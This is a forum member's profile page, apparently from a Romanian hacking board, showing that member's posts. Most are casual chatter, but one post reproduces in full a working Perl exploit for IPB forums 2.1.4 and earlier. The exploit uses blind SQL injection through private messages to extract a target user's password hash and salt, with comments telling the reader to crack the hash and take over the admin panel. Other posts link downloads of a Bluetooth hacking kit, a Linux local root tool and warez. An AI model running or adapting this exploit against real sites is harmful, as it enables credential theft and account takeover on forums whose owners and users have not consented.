Ecstasy
Members-
Posts
24 -
Joined
-
Last visited
Never
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
Ecstasy's Achievements
Newbie (1/14)
10
Reputation
-
Knoppix Install - How to install knoppix linux to your hard
Ecstasy replied to MaHaReT's topic in Cosul de gunoi
Hmm, thruthewire.net has pinched all of IronGeek's video's lol... -
Hey, If anyone is interested in football, who do you think is going to win the world cup ? I think Brasil has a good chance, but personally I would like England to win. So let me know what you guys think
-
Ahh, ok then thanks for letting me know guys
-
#!/usr/bin/perl ############################################################################# ## IPB <=2.1.4 exploit (possibly 2.1.5 too)                  ## Brought to you by SHAK AND TEMUJIN.                 ## Originally by the Ykstortion security team.       ##                        ## The exploit will retrieve the MD5 pass hash along with the case ## sensitive salt ## ## The bug is in the pm system so you must have a registered user.      ## The exploit will extract a password hash from the forum's data base of   ## the target user.                              ## You need to know the target user's member ID but it's not difficult to   ## find out, just look under their avatar next to one of their posts.     ## After you run the exploit, crack the hash with the salt                ## and log into the ACP ## ## Usage:                                   ##  $ ./ipb                                 ##  IPB Forum URL ? forums.example.com/forums                ##  Your username ? krypt_sk1dd13                      ##  Your pass ? if_your_on_nix_this_gets_hidden               ##  Target userid ? 3637                           ##                                      ##  Attempting to extract password hash from database...          ##  537ab2d5b37ac3a3632f5d06e8e04368 ##  Attempting to extract password salt from database... ##  _jnDE ##  Hit enter to quit.                            ##                                      ## Requirements:                               ##  o Perl 5                                ##  o LWP 5.64 or later                           ##  o Internet access                            ##  o A forum                        ##  o A user on said forum                          ##  o 32+ PMs left till your inbox is full, if not you can still delete   ##   PMs from your inbox as the successful ones come through        ##                                      ## Credit to: Nuticulus for finding the SQL injection             ##                                                             ###########################################################################  use HTTP::Cookies; use LWP 5.64; use HTTP::Request;  # variables my $login_page = '?act=Login&CODE=01'; my $pm_page = '?act=Msg&CODE=04'; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $hash = ''; my $need_null = 0; my $i; my $j;  my @charset = ('0'..'9','a'..'f');  my %form = (act    => 'Msg',  CODE    => '04',  MODE    => '01',  OID    => '',  removeattachid  => '',  msg_title  => 'asdf',  bbmode    => 'normal',  ffont    => 0,  fsize    => 0,  fcolor    => 0,  LIST    => ' LIST ',  helpbox    => 'Insert Monotype Text (alt + p)',  tagcount  => 0,  Post    => 'jkl');    # objects my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); my $resp;  # init the cookie jar $ua->cookie_jar ($cj);  # allow redirects on post requests push @{ $ua->requests_redirectable }, "POST";  # get user input print 'IPB Forum URL ? '; chomp (my $base_url = <STDIN>); print 'Your username ? '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your pass ? '; #system 'stty -echo';    # to turn off echoing chomp (my $pass = <STDIN>); #system 'stty echo';    # to turn it back on print "n"; print 'Target userid ? ';  # it'll say next to one of their posts chomp (my $tid = <STDIN>);  # parse the given base url if ($base_url !~ m#^[url]http://#[/url]) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }  do {  $resp = $ua->post ($base_url . $login_page,    [ UserName => $user,     PassWord => $pass,     CookieDate => 1,    ]); } while ($tries-- && !$resp->is_success());  # reset tries $tries = 5;  # did we get 200 (OK) ? if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }  # was the pass right ? if ($resp->content =~ /sorry, the password was wrong/i) {  die "Error: password incorrect.n"; }  # get ourselves a post_key (and an auth_key too with newer versions) do {  $resp = $ua->get ($base_url . $pm_page); } while ($tries-- && !$resp->is_success());  # reset tries $tries = 5;  if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" } if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?post_key["']?s+?value=["']?([0-9a-f]{32})["']?s+?/>#) {  $form{post_key} = $1; } else {  die "Error: couldn't get a post key.n"; } if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?auth_key["']?s+?value=["']?([0-9a-f]{32})["']?s+/>#) {  $form{auth_key} = $1; }  # turn off buffering so chars in the hash show up straight away $| = 1;  print "nAttempting to extract password hash from database...n ";  OFFSET: for ($i = 0; $i < 32; ++$i) {  CHAR:  for ($j = 0; $j < scalar(@charset); ++$j) {    # reset tries    $tries = 5;    print "x08", $charset[$j];    # build sql injection    $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('      . (join (',', map {ord} split ('', $user))) . ') FROM '      . 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('      . 'converge_pass_hash, ' . ($i + 1) . ', 1) = CHAR('      . ord ($charset[$j]) . ')';    $form{from_contact} = $sql;    $resp = $ua->post ($base_url . $post_pm_page, %form,     referer => $base_url . $pm_page);    if (!$resp->is_success()) {     die "nError: " . $resp->status_line      . "n" if (!$tries);     --$tries;     redo;    }    if ($resp->content =~ /sql error/i) {     if ($need_null) {       die "Error: SQL error.n";     } else {       $need_null = 1;       redo OFFSET;     }    } elsif ($resp->content !~ /there is no such member/i) {     # we have a winner !     print ' ';     next OFFSET;    }  }  # uh oh, something went wrong  print "nError: couldn't get a char for offset $in"; }  @charset = (); for($j = 33; $j <= 126; $j++) { push(@charset, chr($j)); }  print "nAttempting to extract password salt from database...n ";  OFFSET: for ($i = 0; $i < 5; ++$i) {  CHAR:  for ($j = 0; $j < scalar(@charset); ++$j) {    # reset tries    $tries = 5;    print "x08", $charset[$j];    # build sql injection    $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('      . (join (',', map {ord} split ('', $user))) . ') FROM '      . 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('      . 'converge_pass_salt, ' . ($i + 1) . ', 1) = BINARY CHAR('      . ord ($charset[$j]) . ')';    $form{from_contact} = $sql;    $resp = $ua->post ($base_url . $post_pm_page, %form,     referer => $base_url . $pm_page);    if (!$resp->is_success()) {     die "nError: " . $resp->status_line      . "n" if (!$tries);     --$tries;     redo;    }    if ($resp->content =~ /sql error/i) {     if ($need_null) {       die "Error: SQL error.n";     } else {       $need_null = 1;       redo OFFSET;     }    } elsif ($resp->content !~ /there is no such member/i) {     # we have a winner !     print ' ';     next OFFSET;    }  }  # uh oh, something went wrong  die "nError: couldn't get a char for offset $in"; }  print "x08 x08nHit enter to quit.n"; <STDIN>;
-
Any one know why h4cky0u.org is offline ?
-
BlueTooth Hacking Kit. http://d.turboupload.com/d/722626/Bluetooth-Hacking-Kit.zip.html
-
By sys7em. http://rapidshare.de/files/18195248/Root_on_Linux.rar.html
-
Linux local root http://www.sh3ll.persiangig.com/Film/Linux%20Local%20Root.rar
-
vBulletin 3.5.x http://d.turboupload.com/d/736458/Vbulletin_3.5.x._By_Cro-Warez.rar.html
-
Hi, I'm wondering is there a way I can make the board use english ? because I cannot speak romanian :@Cheers